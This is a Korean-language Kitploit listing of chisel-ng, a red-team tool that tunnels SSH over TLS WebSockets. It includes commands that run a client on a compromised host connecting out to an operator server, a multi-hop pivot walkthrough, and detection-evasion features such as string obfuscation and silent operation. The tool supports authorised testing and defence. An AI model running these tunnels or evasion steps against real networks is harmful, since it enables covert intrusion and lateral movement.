Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
chisel-ng — Chisel 차세대, Rust로 작성됨. 일부 커스터마이징이 적용된 WSS 기반 SSH. | Kitploit
도구/GitHubGitHub/nullsection/chisel-ng
IDS/IPS EvasionLateral MovementPost-ExploitationNetwork SecurityPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubnullsection/chisel-ng

chisel-ng

Chisel 차세대, Rust로 작성됨. 일부 커스터마이징이 적용된 WSS 기반 SSH.

저장소 보기
13696개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

| | ()___ | | _ __ __ _ / | ' | / |/ _ \ || ' \ / ` | | (__| | | | _ \ / || | | | (| | _|| |||/_|| || ||_, | |___/

chisel-ng

Rust License Windows Linux

침투 테스트 및 레드 팀 작전을 위한 chisel의 Rust 구현체입니다. SSH-over-WebSocket-over-TLS를 통해 역터널을 구축하여, 운영자가 정상 HTTPS 트래픽과 혼합되면서 손상된 호스트를 통해 피벗할 수 있도록 합니다.


목차

  • 빠른 시작
  • 기능
  • 아키텍처
  • 사용법 참조
    • 서버 (운영자)
    • 역방향 클라이언트 (에이전트)
    • 바인드 클라이언트 (에이전트 - 인바운드 모드)
    • CLI 명령어
  • 다중 홉 피벗
  • 기술 세부 사항
  • OPSEC 고려 사항
  • 면책 조항

빠른 시작

요구 사항

  • Rust 1.70+ (rustup.rs)

빌드

root@kitploit:~
git clone https://github.com/nullsection/chisel-ng
cd chisel-ng
cargo build --release

바이너리는 target/release/에 출력됩니다: chisel-server, chisel-client, chisel-bind-client

기본 사용법

1. 서버 시작 (운영자):

root@kitploit:~
./chisel-server -p 'secret' -v

2. 클라이언트 실행 (대상):

root@kitploit:~
./chisel-client -s operator.example.com:8443 -p 'secret' -k

3. 터널 생성:

root@kitploit:~
chisel-ng> session 1
[session-1] TARGET > tunnel 8080:192.168.1.100:80
[session-1] TARGET > socks5 1080

4. 내부 서비스에 접근:

root@kitploit:~
curl http://127.0.0.1:8080
curl --socks5 127.0.0.1:1080 http://internal.corp/

기능

  • SSH over WebSocket over TLS - 정상 HTTPS 트래픽과 혼합
  • 사전 공유 키 인증 - 간단하고 안전한 인증
  • 동적 포트 포워딩 - 필요 시 터널 생성
  • SOCKS5 프록시 - 에이전트를 통한 동적 라우팅
  • 두 가지 클라이언트 모드 - 역방향 (외부 연결) 및 바인드 (인바운드 수락)
  • 크로스 플랫폼 - Windows 및 Linux

아키텍처

root@kitploit:~
+------------------+              +----------------------------------+
|     Operator     |              |         Target Network           |
|                  |              |                                  |
| +--------------+ |     SSH      | +--------------+                 |
| |chisel-server |<---------------+-|chisel-client |                 |
| |    :8443     | |   (over TLS) | |  (reverse)   |                 |
| +--------------+ |              | +--------------+                 |
+------------------+              +----------------------------------+

프로토콜 스택:

root@kitploit:~
TCP -> TLS 1.3 -> WebSocket -> SSH -> Tunnel Data
                     ^
            appears as HTTPS

클라이언트 모드:

  • 역방향 (chisel-client) - 서버로 아웃바운드 연결
  • 바인드 (chisel-bind-client) - 인바운드 수신 대기; 서버는 connect 명령 사용

사용법 참조

서버 (운영자)
root@kitploit:~
OPTIONS:
    -l, --listen <ADDR>      수신 주소 [기본값: 0.0.0.0:8443]
    -p, --psk <PSK>          사전 공유 키 또는 암호 [환경변수: CHISEL_PSK]
        --cert <FILE>        TLS 인증서 (PEM)
        --key <FILE>         TLS 개인 키 (PEM)
        --generate-psk       무작위 PSK 생성 후 종료
    -v, --verbose            상세 출력
역방향 클라이언트 (에이전트)
root@kitploit:~
OPTIONS:
    -s, --server <ADDR>      서버 주소 (host:port)
    -p, --psk <PSK>          사전 공유 키 또는 암호 [환경변수: CHISEL_PSK]
    -u, --user <LABEL>       세션 레이블 [기본값: agent]
    -k, --insecure           TLS 인증 건너뛰기
        --no-reconnect       자동 재연결 비활성화
    -i, --interval <SECS>    재연결 간격 [기본값: 30]
        --heartbeat <SECS>   하트비트 간격 [기본값: 30]
    -v, --verbose            상세 출력
바인드 클라이언트 (에이전트 - 인바운드 모드)

아웃바운드를 시작하지 않고 인바운드를 수락할 수 있는 대상의 경우:

root@kitploit:~
OPTIONS:
    -l, --listen <ADDR>      수신 주소 (예: 0.0.0.0:9000)
    -p, --psk <PSK>          사전 공유 키 또는 암호 [환경변수: CHISEL_PSK]
    -u, --user <LABEL>       세션 레이블 [기본값: agent]
    -k, --insecure           TLS 인증 건너뛰기
        --heartbeat <SECS>   하트비트 간격 [기본값: 30]
    -v, --verbose            상세 출력
서버 CLI 명령어

메인 메뉴:

root@kitploit:~
sessions             연결된 세션 목록
session <id>         세션 선택
connect <ip:port>    바인드 클라이언트에 연결
disconnect <id>      세션 연결 해제 (재연결됨)
kill <id>            클라이언트 프로세스 종료

세션 메뉴:

root@kitploit:~
tunnel <local>:<target_ip>:<target_port>    터널 생성
tunnel --local <local>:<target>:<port>      터널 생성 (localhost 전용)
tunnel stop <port>                          터널 중지
tunnels                                     터널 목록
socks5 <port>                               SOCKS5 프록시 시작
socks5 stop <port>                          SOCKS5 프록시 중지
ping                                        지연 시간 측정
ps                                          원격 프로세스 목록
netstat                                     원격 연결 목록

다중 홉 피벗

기존 세션을 체이닝하여 격리된 네트워크에 도달합니다.

시나리오: DMZ 호스트가 운영자에게 도달 가능. 내부 호스트(10.0.0.50)는 DMZ에서만 도달 가능.

root@kitploit:~
+----------+        +-----------+        +------------+
| Operator |--SSH---| Session 1 |--TCP---| Session 2  |
|  Server  |        |   (DMZ)   |        | (INTERNAL) |
+----------+        +-----------+        +------------+

1단계 - 서버 시작 (운영자):

root@kitploit:~
./chisel-server -p 'secret' -v

2단계 - 역방향 클라이언트 실행 (DMZ 호스트):

root@kitploit:~
./chisel-client -s operator.example.com:8443 -p 'secret' -k

3단계 - 바인드 클라이언트 실행 (내부 호스트 10.0.0.50):

root@kitploit:~
./chisel-bind-client -l 0.0.0.0:9000 -p 'secret' -k

4단계 - 터널 생성 및 연결 (서버 CLI):

root@kitploit:~
chisel-ng> session 1
[session-1] DMZ > tunnel --local 9000:10.0.0.50:9000
Tunnel started on 127.0.0.1:9000

[session-1] DMZ > back
chisel-ng> connect 127.0.0.1:9000
Session 2 registered

chisel-ng> session 2
[session-2] INTERNAL > socks5 1080

기술 세부 사항

터널 작동 방식

터널 생성 시 (tunnel 8080:192.168.1.100:80):

  1. 서버가 로컬 포트 8080을 바인드
  2. 연결 시 서버가 에이전트에 CONNECT 요청 전송
  3. 에이전트가 대상에 연결하고 SSH direct-tcpip 채널 열기
  4. 데이터가 양방향으로 브리징
SOCKS5 작동 방식

RFC 1928 핸드셰이크를 통한 동적 대상. 정확한 포트 스캐닝 결과를 위해 적절한 오류 코드 반환.


OPSEC 고려 사항

바이너리 강화

릴리스 빌드는 강화되어 있습니다:

  • 무음 작동 - 모든 로깅이 무효 연산으로 컴파일됨
  • 문자열 난독화 - 프로토콜 문자열이 컴파일 시 XOR 암호화됨
  • 심볼 제거 - 디버그 심볼이나 소스 경로 없음
  • 크기 최적화 - 디버그 ~15 MB 대비 ~3 MB
  • 패닉 동작 - 즉시 중단, 스택 트레이스 없음
작전 보안
  • PSK 인증 - 암호에서 SHA-256으로 생성된 256비트 키 또는 원시 16진수
  • 자격 증명 저장 없음 - 인수 또는 환경 변수로만 PSK 전달
  • 자동 재연결 - 기본 활성화, 간격 구성 가능
  • 하트비트 - 구성 가능한 연결 유지, --heartbeat 0으로 비활성화
탐지 벡터
  • JA3/JA4 TLS 지문
  • WebSocket 업그레이드 패턴
  • 장기 연결 지속 시간
  • 일정한 하트비트 간격

면책 조항

이 도구는 허가된 보안 테스트 목적으로만 사용됩니다. 사용 전에 적절한 승인을 받으십시오. 저자는 오용에 대해 책임을 지지 않습니다.


라이선스

MIT

도구 다운로드